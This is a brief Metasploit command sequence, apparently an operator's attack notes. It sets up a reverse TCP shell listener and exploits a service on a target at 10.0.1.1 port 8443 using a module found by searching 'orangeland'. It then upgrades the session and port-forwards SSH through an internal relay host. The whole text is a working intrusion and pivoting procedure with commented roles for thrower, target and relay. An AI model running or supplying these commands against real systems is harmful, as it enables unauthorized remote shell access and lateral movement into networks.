use /multi/handler
set payload linux/x86/shell_reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
// Thrower port
exploit -j
search orangeland
use 0
set payload generic/custom
set LPORT 4444
// Thrower port
set LHOST 10.0.1.21
// Thrower IP
set RPORT 8443
// Target port
set RHOST 10.0.1.1
// Target IP
exploit
sleep 60
sessions -u 1
sessions -C "portfwd add -l 22 -p 22 -r 172.31.82.221"
// Relay IP
